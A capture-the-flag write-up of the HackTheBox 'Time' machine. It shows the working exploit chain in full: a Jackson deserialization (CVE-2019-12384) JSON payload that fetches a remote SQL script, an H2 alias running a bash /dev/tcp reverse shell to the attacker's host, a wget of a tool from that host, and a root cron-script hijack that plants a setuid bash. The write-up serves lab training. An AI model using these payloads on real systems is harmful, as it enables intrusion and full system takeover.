HackTheBox - Time write up
4 min read

HackTheBox - Time write up

HackTheBox - Time write up

Time is a Medium Linux box.

Recon

As always, let's start with a nmap scan.

$ nmap -p- -A -T4 -oN scan.nmap 10.10.10.214

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only two ports are open, 22 and 80.

Web

http://10.10.10.214/index.php

We have two options for the JSON, a Beautifier and a Validator. The Validator one is in beta, let's stress it.

You can throw up an exception with this JSON {"": ""}.

Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object

So, we know that the JSON is parsed by this tool com.fasterxml.jackson. Let's find some CVE !

After some research and failed try, I find that the application is vulnerable to CVE-2019-12384. This vulnerability is well explain on this blog and I use this exploit from Github to get a RCE (Remote Code Execution).

I send this JSON payload :

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.138:4444/inject.sql'"}]

This tell the web application to run the script inject.sql from a remote server (10.10.14.138 is my machine). The inject.sql looks like this :

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
	String[] command = {"bash", "-c", cmd};
	java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
	return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.138/1337 0>&1')

It is design for H2 Database, here it executes a bash reverse shell that connects to my machine.

xanhacks~ $ nc -lvnp 1337
Connection from 10.10.10.214:42760
bash: cannot set terminal process group (943): Inappropriate ioctl for device
bash: no job control in this shell
pericles@time:/var/www/html$ id
uid=1000(pericles) gid=1000(pericles) groups=1000(pericles)
pericles@time:/var/www/html$ cd /home/pericles
pericles@time:/home/pericles$ cat user.txt
eb754b95f8a294c4dc6a...

We get a shell and the user.txt flag !

Root

After enumerating the box, I found a homemade shell script in /usr/bin.

$ ls -al /usr/bin/timer_backup.sh
-rwxrw-rw- 1 pericles pericles 88 Dec 27 21:50 /usr/bin/timer_backup.sh

$ cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip

I try to find some cron jobs that run this script but unfortunately we do not have enough permission to do that. So, I upload psspy on the box to snoop on processes without need for root permissions.

pericles@time:/tmp$ wget 10.10.14.138:4444/pspy64s
wget 10.10.14.138:4444/pspy64s
--2020-12-27 21:59:24--  http://10.10.14.138:4444/pspy64s
Connecting to 10.10.14.138:4444... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1156536 (1.1M) [application/octet-stream]
Saving to: ‘pspy64s’

pspy64s             100%[===================>]   1.10M   100KB/s    in 12s     

2020-12-27 21:59:35 (97.8 KB/s) - ‘pspy64s’ saved [1156536/1156536]

pericles@time:/tmp$ chmod +x pspy64s

pericles@time:/tmp$ ./pspy64s
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
...
2020/12/27 22:00:31 CMD: UID=0    PID=138631 | zip -r website.bak.zip /var/www/html
...

Every ten seconds the command inside /usr/bin/timer_backup.sh is executed by root (UID=0). This is our file so we can modify its content and add it our malicious command.

echo '#!/bin/bash' > /usr/bin/timer_backup.sh
echo "cp /bin/bash /tmp/bash && chmod u+s /tmp/bash" >> /usr/bin/timer_backup.sh

wait 10 seconds

pericles@time:/tmp$ /tmp/bash -p
bash-5.0# id
uid=1000(pericles) gid=1000(pericles) euid=0(root) groups=1000(pericles)
bash-5.0# cat /root/root.txt 
63e4c1b6a0b8b314d47a8...

Rooted !

Enjoying these posts? Subscribe for more